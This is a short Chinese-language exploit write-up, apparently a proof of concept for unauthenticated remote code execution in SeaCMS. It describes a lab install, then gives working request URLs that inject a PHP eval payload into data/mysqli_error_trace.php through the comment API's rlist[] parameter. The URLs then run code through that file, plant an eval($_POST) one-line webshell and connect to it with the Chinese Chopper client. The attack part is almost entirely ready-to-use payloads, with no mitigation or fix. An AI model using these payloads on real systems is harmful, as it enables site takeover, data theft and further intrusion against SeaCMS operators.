seacms前台getshell

0x01 简介

海洋影视管理系统（seacms，海洋cms）海洋cms是基于PHP+MySql技术开发的开源CMS，是一套专为不同需求的站长而设计的视频点播系统，灵活，方便，人性化设计简单易用是最大的特色，是快速架设视频网站首选。

0x02 环境搭建
使用phpstudy进行搭建。将整个upload上传到phpstudy目录下的www目录。将upload更改为seacms。
http://xxx.xxx.xxx.xxx/seacms/install/index.php进行安装。

安装成功后访问前台界面

0x03 漏洞触发位置

：/comment/api/index.php?gid=1&page=2&rlist[]=*hex/@eval($_GET[a]);?%3E

写入php代码执行一句话木马

url地址：

http://192.168.124.128/seacms//comment/api/index.php?gid=1&page=2&rlist[]=*hex/@eval($_GET[a]);?%3E

写入的地址为 data/mysqli_error_trace.php

访问写入的代码执行木马：

http://192.168.124.128/seacms//data/mysqli_error_trace.php?a=phpinfo();

写入getshell一句话木马

/data/mysqli_error_trace.php?a=@eval($_POST['a']);

http://192.168.124.128/seacms//data/mysqli_error_trace.php?a=@eval($_POST[%27a%27]);

上菜刀连接